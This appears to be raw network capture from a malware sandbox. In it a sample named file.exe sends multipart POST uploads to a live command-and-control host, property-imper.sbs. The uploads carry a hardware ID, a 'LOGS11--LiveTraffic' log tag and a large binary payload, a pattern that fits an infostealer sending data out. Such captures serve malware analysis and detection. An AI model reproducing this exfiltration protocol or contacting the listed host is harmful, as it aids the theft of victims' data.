                                                                                                                                                                                  4192.168.2.449734172.67.162.844437280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:46:21 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=J15FM8B4
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 20383
                                                                                                                                                                                  Host: property-imper.sbs
                                                                                                                                                                                  2024-11-23 13:46:21 UTC15331OUTData Raw: 2d 2d 4a 31 35 46 4d 38 42 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 32 33 30 32 42 35 39 31 39 38 31 39 41 42 37 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4a 31 35 46 4d 38 42 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4a 31 35 46 4d 38 42 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4a 31 35 46 4d 38 42 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                  Data Ascii: --J15FM8B4Content-Disposition: form-data; name="hwid"52302B5919819AB7D7CBBD6DF28D3732--J15FM8B4Content-Disposition: form-data; name="pid"3--J15FM8B4Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--J15FM8B4Content-Di
                                                                                                                                                                                  2024-11-23 13:46:21 UTC5052OUTData Raw: 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7
                                                                                                                                                                                  Data Ascii: lrQMn 64F6(X&7~`aO@dR<x)
                                                                                                                                                                                  2024-11-23 13:46:22 UTC1027INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:46:22 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=mrltkachknfji25lql605t2bp6; expires=Wed, 19-Mar-2025 07:33:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AmVSV0h5Z0U9Lzuv8%2BUg5c34%2FSAuC1VxAm%2BnGsmmqyZtH4vmy2e4Q%2B0q9yG2lrCF3nzoO6HmxpKPVHh%2BNAZFVhMJI3%2BwRy7m1%2BcbU4v5gdUb2cqIAydfAyf%2BOflrWX7QdB0Eb3Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8e719adf897c0fa4-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1679&sent=17&recv=23&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21337&delivery_rate=1704611&cwnd=176&unsent_bytes=0&cid=d50c30b45d9f14c5&ts=989&x=0"
                                                                                                                                                                                  2024-11-23 13:46:22 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                  Data Ascii: eok 8.46.123.75
                                                                                                                                                                                  2024-11-23 13:46:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  5192.168.2.449735172.67.162.844437280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:46:24 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=4Z3Q494E1W7T2F
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 1233
                                                                                                                                                                                  Host: property-imper.sbs
                                                                                                                                                                                  2024-11-23 13:46:24 UTC1233OUTData Raw: 2d 2d 34 5a 33 51 34 39 34 45 31 57 37 54 32 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 32 33 30 32 42 35 39 31 39 38 31 39 41 42 37 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 34 5a 33 51 34 39 34 45 31 57 37 54 32 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 5a 33 51 34 39 34 45 31 57 37 54 32 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 34 5a
                                                                                                                                                                                  Data Ascii: --4Z3Q494E1W7T2FContent-Disposition: form-data; name="hwid"52302B5919819AB7D7CBBD6DF28D3732--4Z3Q494E1W7T2FContent-Disposition: form-data; name="pid"1--4Z3Q494E1W7T2FContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--4Z
                                                                                                                                                                                  2024-11-23 13:46:25 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:46:25 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=tosan9hmd79e4n581n59lgrohc; expires=Wed, 19-Mar-2025 07:33:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YhR2a1J94QiI4OONSP9MqI%2FqLs%2BLSZajzdsTh02YR9UCieXo3wUfa6RLkB7Syqf2hpAvyngv6CsjAi%2Bu5ZsW9AY1SCC2CV8mTbsoAuVjoEJoVZm2IdpAzg%2FYfcQ8pqW8YmWUEg8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8e719af00cec7280-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1838&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2148&delivery_rate=1562332&cwnd=247&unsent_bytes=0&cid=1e1d211fea9edba5&ts=752&x=0"
                                                                                                                                                                                  2024-11-23 13:46:25 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                  Data Ascii: eok 8.46.123.75
                                                                                                                                                                                  2024-11-23 13:46:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  6192.168.2.449737172.67.162.844437280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:46:27 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=AKSRY9UZPZIX935
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 549296
                                                                                                                                                                                  Host: property-imper.sbs
                                                                                                                                                                                  2024-11-23 13:46:27 UTC15331OUTData Raw: 2d 2d 41 4b 53 52 59 39 55 5a 50 5a 49 58 39 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 32 33 30 32 42 35 39 31 39 38 31 39 41 42 37 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 41 4b 53 52 59 39 55 5a 50 5a 49 58 39 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 4b 53 52 59 39 55 5a 50 5a 49 58 39 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                                  Data Ascii: --AKSRY9UZPZIX935Content-Disposition: form-data; name="hwid"52302B5919819AB7D7CBBD6DF28D3732--AKSRY9UZPZIX935Content-Disposition: form-data; name="pid"1--AKSRY9UZPZIX935Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                                  2024-11-23 13:46:27 UTC15331OUTData Raw: 7e 1c a9 96 ed ff a9 4f 55 9c 20 f6 64 ab 2b c0 6c c1 d9 af ad 47 35 3f 45 35 f7 e3 2c 71 d2 16 25 cf 51 fa a9 ee 27 53 34 92 bc a1 1d ec 29 6d c7 e8 58 91 bd e9 81 1a f4 c7 0b 75 db 43 c6 12 59 cf 51 14 5f cc 25 dd a6 c0 b0 fc 6e 98 20 32 f5 6d f4 cc 68 8d 03 ba be e0 b4 79 fc 2e ef f5 c1 d3 1c 15 fc 2d 53 e3 46 94 98 7d 8f 69 06 ee 06 c2 0e 14 59 23 0e 99 75 92 12 d3 2a 94 d9 f6 ba 07 c4 1d 5c f6 76 60 b3 d4 ca 56 e1 22 7a 26 76 f3 74 9d ff 9f d2 8c ba 3a 33 4c 00 9b 48 c3 5f 53 f0 1f dc d4 44 03 73 34 cd 80 78 2b 0a 72 3e 01 4a 03 5e 40 b0 0f af 5f a2 8f 7e ab 5f 48 11 b4 28 a2 c2 dc 9d 6f f8 40 03 81 88 e5 7c 7a 5b 0a 0c 3e b4 32 96 71 80 f3 2a 97 ff 08 1e eb fe 31 ff 60 ed b6 b0 00 e8 c8 aa d2 9b 26 2e 6e 63 40 89 1c 5b 4e 19 d0 82 4b f0 fe 02 c4 99
                                                                                                                                                                                  Data Ascii: ~OU d+lG5?E5,q%Q'S4)mXuCYQ_%n 2mhy.-SF}iY#u*\v`V"z&vt:3LH_SDs4x+r>J^@_~_H(o@|z[>2q*1`&.nc@[NK
                                                                                                                                                                                  2024-11-23 13:46:27 UTC15331OUTData Raw: e7 f2 05 5d d2 46 16 ec 92 7a a0 c3 9b 6e 36 f1 25 34 38 84 17 9f 4a 69 d3 58 0f a1 61 37 39 30 2c 01 2b 92 15 12 4a 1b 27 d5 5a 94 50 86 39 53 61 11 c6 7d a3 c6 85 bc 6f 6b 52 3d b0 88 1d b1 03 8f b2 43 5d be 6f e4 f1 bd 44 fd 3e e1 20 db d5 ab 89 e9 72 1d e5 24 96 b0 16 69 14 a5 7f c5 a5 f4 79 c0 d8 7b 5a fd 25 de 8b fb 84 3a 27 79 af 44 06 11 3c c8 65 02 bc 90 04 a6 34 d3 20 89 98 98 40 39 12 68 b7 eb a5 50 6d aa fa f5 b4 c8 e8 97 49 7f 96 21 5d ee ba 1b 4f 49 51 f0 86 39 2d 16 f3 61 47 b6 37 b6 a0 9b 1e 15 1e 45 27 ee ac c3 dc 0d 12 71 0f e0 13 75 89 97 b6 09 71 3a 71 04 2f 04 f1 3d 34 72 1b 13 aa c4 dc 8a 9d 42 fd e3 a5 48 ca e3 9f 29 6d f0 45 e9 09 4c 96 26 b3 24 d8 4b 7a 46 13 8a c7 c3 95 06 22 b5 e5 f3 13 ae 6b 28 91 d3 a2 42 70 79 1b 4e 75 94 72
                                                                                                                                                                                  Data Ascii: ]Fzn6%48JiXa790,+J'ZP9Sa}okR=C]oD> r$iy{Z%:'yD<e4 @9hPmI!]OIQ9-aG7E'quq:q/=4rBH)mEL&$KzF"k(BpyNur
                                                                                                                                                                                  2024-11-23 13:46:27 UTC15331OUTData Raw: 95 45 ee ff c4 8d 1e 77 24 ca 53 93 21 33 5c 52 62 e8 89 31 e6 ad f6 ae 2a 03 23 83 da 90 d9 df 19 77 19 01 1b 72 64 0d 48 14 13 d5 03 bf ed 37 1e 08 fa 38 c6 7e e7 6d 39 52 69 2c 40 5f 5e 9a d6 92 3b bd ce 9d 10 53 1c 11 d8 2c f8 9c 36 df 9f 5e 5e 76 53 9c 2e 9f 4e 4c 0e f5 59 40 88 9d 86 69 42 7a 7c e0 ec 69 32 f9 64 dc 5c ad 2d 1c cb 3a 08 4e 83 32 96 4e ae 4a 96 cb f1 2e 8b f5 9e 30 e1 be cd 0f f3 17 a3 1d d9 d2 d2 2d af fa 84 ba 30 f7 0e d4 20 10 4d f8 98 63 f3 25 43 9b 70 ae 75 23 8c 94 60 f9 e4 c6 6a 4d d9 78 84 52 4e db 6a ad 36 f5 c6 37 e2 45 08 c7 bb 20 db 7f cd 3c 01 a1 29 4c cd 63 68 4f 73 03 55 cf 2c 69 ff 8b 19 96 11 c4 4f ec 9e 7c 1f 4c 5d af 93 c2 41 b2 49 f6 01 d7 c6 c1 8a 0f 83 79 0f 39 ac e6 26 dc 14 a7 71 85 98 6c d1 ef 76 17 e2 5f b2
                                                                                                                                                                                  Data Ascii: Ew$S!3\Rb1*#wrdH78~m9Ri,@_^;S,6^^vS.NLY@iBz|i2d\-:N2NJ.0-0 Mc%Cpu#`jMxRNj67E <)LchOsU,iO|L]AIy9&qlv_
                                                                                                                                                                                  2024-11-23 13:46:27 UTC15331OUTData Raw: 66 ff f0 1c 0f f7 24 be 46 9f 41 0c 31 99 3d f3 45 27 c6 cc df cc 54 d1 31 a3 10 72 f9 5f db 6b 41 c4 9c 79 87 18 1a 69 29 02 66 4e 69 2a 6b 8c 46 72 13 b4 5b aa bd 7e 6e 86 19 08 fb 14 dd ee 4f 4c 88 a7 0b 6d 21 dc 83 d5 33 2c 54 ae 79 f8 4c 95 86 c2 4c e7 39 ba 29 43 e2 76 47 c1 a2 3d 4a 03 1b 18 b4 b7 7b 24 db 40 97 64 b9 9e 3f 29 79 4e 93 90 13 23 d4 f6 c7 d4 69 57 13 a4 75 99 28 75 47 d2 28 a9 ad ae d6 9e 6f 19 6c e2 b6 a4 d6 6f 1c 93 52 e7 e4 4b 61 ce 11 eb f3 0a 88 4c 59 45 49 86 0f 77 48 0a 28 68 09 c1 82 68 c4 ff da d8 28 16 fc f6 a6 6e 98 63 ee 70 df b7 f1 5d 39 eb 4f 6c ef 70 f5 11 8c 8f 79 d5 9f e8 2b 82 e7 b4 d0 be 77 29 bc 9c 76 f9 09 fa e0 f1 c0 cb bb 30 5f 6f 26 8a 1a a6 bf ff 7f b4 ad 01 eb c3 ff c5 db 6e 02 c8 0e 3e dc 7a 1d 90 8d be 22
                                                                                                                                                                                  Data Ascii: f$FA1=E'T1r_kAyi)fNi*kFr[~nOLm!3,TyLL9)CvG=J{$@d?)yN#iWu(uG(oloRKaLYEIwH(hh(ncp]9Olpy+w)v0_o&n>z"
                                                                                                                                                                                  2024-11-23 13:46:27 UTC15331OUTData Raw: 8e 37 7b 1f 36 7a 96 17 1d 88 22 19 19 46 06 f3 b2 3c 23 bf aa 8a 0d 5d 90 aa bf eb 50 c2 c1 a1 17 55 6a ee 1a 3f 22 61 03 24 36 7b 10 1f 14 55 e8 cd 05 6d ef 8c e1 69 43 93 b5 38 00 63 a7 b4 e0 e2 ee e9 0d 5c 8a bd d9 0f 88 08 fb 9f 4e 74 57 d8 9f 7c 8d 3f 09 59 b0 45 18 78 8a 1d e8 6e 98 1d d0 da e4 44 15 9f 25 f9 10 71 e0 08 df 42 aa 8a 5f 61 33 08 72 0f cc f7 1e 5f 6e 1d 89 27 09 a7 05 b6 43 15 93 82 20 ad b7 6c 80 b3 be f8 76 83 f0 7d 66 60 bb 5f 29 64 7e 30 68 39 9b 17 98 ab 83 a4 50 ea 5d fb f4 0b 3a 24 bc 1a fe 63 e5 41 0d fe e6 cb ec cf a2 c9 a1 c5 73 74 a3 fd 45 9a ef 9b 07 bb ee a0 51 c0 7e b5 aa fe 24 bc 15 09 6f eb 60 78 c0 43 22 e5 13 02 ca 5c 41 37 1f 26 59 19 98 45 db e7 4e f9 72 31 ae 43 f4 73 64 2d 0c b0 e1 c2 aa e3 3d cd 00 2d ed d9 ce
                                                                                                                                                                                  Data Ascii: 7{6z"F<#]PUj?"a$6{UmiC8c\NtW|?YExnD%qB_a3r_n'C lv}f`_)d~0h9P]:$cAstEQ~$o`xC"\A7&YENr1Csd-=-
                                                                                                                                                                                  2024-11-23 13:46:27 UTC15331OUTData Raw: 65 36 60 d0 10 c3 bf 91 74 27 31 fc f0 98 2e 8a 71 af 52 00 07 a2 60 9f a1 d7 d5 3a 23 5d 99 99 cd 45 d0 29 47 bc b0 ab f0 aa 14 e1 aa 63 f4 df 3e 92 0c 4c 40 bc 69 68 de 2f a2 a9 74 ec 62 8d 9b 31 aa ad f8 fd 3d a5 ac 04 9d 11 de a5 17 89 04 db 7b e4 29 23 1f ec 8d d3 72 8c 04 6a 3c dc fc 69 0d 37 fe 6b 3c cf 17 b5 b3 f8 52 9f 5d 83 69 8e 45 8b 21 42 1a bc 09 4e 58 40 9e db f5 3c 3f 01 26 90 6d 37 6e d4 c2 81 6a 9c 2c 2f ca e7 c3 d1 aa 4e b4 0e 89 6b 97 be 52 e7 57 2e c6 ef 1d 3a 5a 6c c9 56 9d 7d 67 91 ef 0a 02 04 94 ca 00 70 b8 b9 65 ad 34 83 d9 37 a7 ed 0c d7 17 5f bd b3 2e 1e f8 e4 e9 ec 33 52 ff 60 3c 8b c4 9b 1b 91 09 e3 f2 2a ee 5f 58 28 f5 ce 5c 8d 7e 7c 78 c9 86 2b b0 e5 42 2d 4e 57 ec e4 a9 5a 1f 5d f6 51 9e 53 de 0f da 0a bc ed a6 62 65 f2 56
                                                                                                                                                                                  Data Ascii: e6`t'1.qR`:#]E)Gc>L@ih/tb1={)#rj<i7k<R]iE!BNX@<?&m7nj,/NkRW.:ZlV}gpe47_.3R`<*_X(\~|x+B-NWZ]QSbeV
                                                                                                                                                                                  2024-11-23 13:46:27 UTC15331OUTData Raw: 66 22 0d 08 87 88 54 48 72 75 30 f5 e7 be e4 a3 10 99 1e 7c 02 b7 44 9d a9 72 28 60 53 bf 16 3c 82 3f 62 71 a7 08 f1 64 31 b7 2b 2d 9e 02 30 c1 0b 09 7b f6 73 1f cf 58 b0 97 ce 9c e0 3a 79 c5 7b c3 d1 01 78 3b 63 c5 43 2c 4b 48 08 57 f3 36 30 46 f6 2a 12 31 02 8d 43 53 8f cc 2a fe df 07 9d 93 77 83 fc a2 91 7d 76 6c 46 fc 1b 79 e9 3e 7a ad 9a 5c 4a 78 ad b4 7d e5 14 43 09 f5 6a 6f fe 0d 57 40 cf a0 77 55 33 e8 57 f2 a2 bb e9 fb 0c 90 b2 9e 37 84 e8 17 ce 48 c0 14 77 d9 0b ac 8b 91 70 24 0d 29 b2 1f dd 2e 7b 73 67 31 ff ff 7d 92 35 df 04 68 79 43 33 df 41 be bb 10 f3 18 12 de 51 df 79 e4 3c ea a7 30 f8 38 e7 8c 86 cf 4b 9d 7c 25 85 45 8d 47 60 17 36 17 eb b1 cb 00 39 9c d4 e7 40 cc 5e e0 9f 3c 42 37 eb 05 ee 0e f0 99 08 1f cc e8 2e 92 01 04 01 75 56 43 4a
                                                                                                                                                                                  Data Ascii: f"THru0|Dr(`S<?bqd1+-0{sX:y{x;cC,KHW60F*1CS*w}vlFy>z\Jx}CjoW@wU3W7Hwp$).{sg1}5hyC3AQy<08K|%EG`69@^<B7.uVCJ
                                                                                                                                                                                  2024-11-23 13:46:27 UTC15331OUTData Raw: 4b 97 3a ea f4 8e f1 e1 27 57 3d 34 1a b1 c7 7e 70 91 1c c5 e5 59 0b 54 c8 6e 85 fb d7 de 47 d3 2a 97 5c bf 1f 24 6a e3 4f 10 b0 96 c4 17 12 2e be 40 72 f9 ef 14 f9 ae 9b 8c 4c c7 4b 09 b9 4e 09 be b6 07 fa d5 a6 84 cd e0 58 a5 99 a9 03 b8 96 12 89 e3 7e 74 92 63 e5 0d d1 95 c8 03 ac d7 2a 0a a9 b7 3c 7d d6 07 53 9b e1 90 84 70 81 99 7d d8 ba fc 13 53 fc b4 6d 8c 2f 20 d7 d0 21 de e1 f5 e6 d3 d8 18 df 83 91 5e 62 2f 37 af f4 91 a4 3b b0 f3 ee 53 89 e9 d6 f7 4c 0d 74 6c 5d d1 43 77 0b cf 6d ff fd 0b 25 b2 74 6e 90 c8 ae 6e 26 b0 53 4b 79 f9 42 9f 54 01 91 9e e6 bb e6 92 36 19 12 2f 00 14 0f bc 01 34 69 8f 32 87 2d 5d 89 19 a9 a5 dc 71 96 ba c6 c8 67 19 d1 37 9f 6d 5c 85 6e 94 c4 54 91 62 11 18 ab 24 cb 10 68 e6 e3 b4 5d 46 6a 13 ff 14 a1 7e df 17 cc 76 26
                                                                                                                                                                                  Data Ascii: K:'W=4~pYTnG*\$jO.@rLKNX~tc*<}Sp}Sm/ !^b/7;SLtl]Cwm%tnn&SKyBT6/4i2-]qg7m\nTb$h]Fj~v&
                                                                                                                                                                                  2024-11-23 13:46:27 UTC15331OUTData Raw: 6f ac 8f 34 53 d2 ba 3e d5 df 5c 32 c9 1b 3a c7 be e7 6f a2 48 66 36 9b a0 22 37 b1 ea 68 bc e2 b5 cf a4 e0 fa f5 69 3e df 94 dd fb 4b d6 c8 bf 93 ff b7 cf 10 0f cd 06 26 46 d3 55 c0 6f be 0a 1e 39 30 59 e9 3c ca f3 c6 4f 0d 77 2e 7b 7b 9a 7c 89 8f 86 67 fd e3 4d 39 0f ae 8b 00 bb 77 e7 ff fc 66 d9 1e 55 76 07 b6 d3 43 39 fd 86 3d 88 b6 ef f4 b3 91 e7 bd c7 9a 34 80 41 3b ed ad d3 ee 8d 53 63 bf 1c a6 c1 c5 bc a7 33 1e 95 85 8f c4 ce d8 b9 5b 5f eb dc 09 fd 2d 92 7a 61 07 0c 78 2f 89 29 d7 4b 01 63 a2 6a 4f 59 c7 8b b8 31 b4 5f c6 04 b7 13 f7 06 c2 bd 41 11 5e 81 b4 99 ac 87 e1 77 25 76 05 e9 ca 7d 3f a8 ab 4f fd f6 2c f0 98 c1 33 45 83 0f 6d 57 a8 d4 6f 0e 6a 3b 45 29 31 03 79 b7 5e 77 6e 55 11 0a 6b 98 7c a6 22 74 21 e9 51 20 e0 9d 59 18 22 3c 8e 46 51
                                                                                                                                                                                  Data Ascii: o4S>\2:oHf6"7hi>K&FUo90Y<Ow.{{|gM9wfUvC9=4A;Sc3[_-zax/)KcjOY1_A^w%v}?O,3EmWoj;E)1y^wnUk|"t!Q Y"<FQ
                                                                                                                                                                                  2024-11-23 13:46:35 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:46:34 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=gqlug8e2uqsdjk5b6p6141u8n2; expires=Wed, 19-Mar-2025 07:33:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5hHfsQDyEERCERhF4iJHYhTb0xGweeMCkRZZQrfFjTerJ7wVX4Pf36DHMg5RQubJeKu3pBMJ7NIA9tMqXRY00tl4a2022BLPDt87Zc1E3x%2BT2bzq5nttVqQbyRivpsKtRpJgPaY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8e719b015e5a5e7c-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1681&sent=338&recv=528&lost=0&retrans=0&sent_bytes=2845&recv_bytes=551776&delivery_rate=1592148&cwnd=183&unsent_bytes=0&cid=b33d15aba9d963c5&ts=7855&x=0"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  7192.168.2.44973620.12.23.50443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:46:29 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oVv8Y9gncPuzzCl&MD=+dMAy9tu HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                                                                                  2024-11-23 13:46:30 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                  MS-CorrelationId: a7d99df4-cab2-410d-bda2-7c93bc74a75b
                                                                                                                                                                                  MS-RequestId: 6de1da43-c8fc-4bed-874d-008fe1f7429d
                                                                                                                                                                                  MS-CV: cooZR11jakez2aTd.0
                                                                                                                                                                                  X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:46:29 GMT
